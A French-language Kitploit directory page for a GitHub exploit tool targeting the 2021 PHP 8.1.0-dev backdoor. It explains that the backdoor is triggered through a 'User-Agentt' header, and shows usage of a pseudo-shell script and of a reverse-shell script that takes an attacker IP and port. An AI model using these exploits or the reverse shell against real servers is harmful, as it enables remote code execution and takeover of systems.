Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
php-8.1.0-dev-backdoor-rce — PHP 8.1.0-dev Backdoor System Shell Script | Kitploit
Outils/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script

Voir le dépôt
9421il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PHP 8.1.0-dev Backdoor Remote Code Execution

PHP 8.1.0-dev Backdoor System Shell Script

docs/logo_php81.png

La version 8.1.0-dev de PHP a été publiée avec une backdoor le 28 mars 2021, mais la backdoor a été rapidement découverte et supprimée. Si cette version de PHP est exécutée sur un serveur, un attaquant peut exécuter du code arbitraire en envoyant l’en-tête User-Agentt.

Le code d'origine a été restauré après la découverte du problème, mais il a ensuite été altéré une seconde fois. La faille aurait créé une backdoor dans tout site Web exécutant la version compromise de PHP, permettant aux pirates d'exécuter du code à distance sur le site.

Lire l'article complet : https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


Script POC

Ce court script d'exploitation backdoor_php_8.1.0-dev.py utilise la backdoor pour fournir un pseudo shell système sur l'hôte. Retrouvez-le sur Exploit DB.

  • Titre de l'exploit : PHP 8.1.0-dev Backdoor Remote Code Execution
  • Date : 23 mai 2021
  • Auteur de l'exploit : flast101
  • Page d'accueil du fournisseur : https://www.php.net/
  • Lien du logiciel : https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • Testé sur la version : 8.1.0-dev
  • CVE : N/A
  • Références de vulnérabilité :
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Utilisation :

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Reverse Shell

Ce court script d'exploitation revshell_php_8.1.0-dev.py fournit un reverse shell sur la cible.

Utilisation :

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

Soyez curieux, apprendre, c'est la vie ! 😃

Télécharger l’outil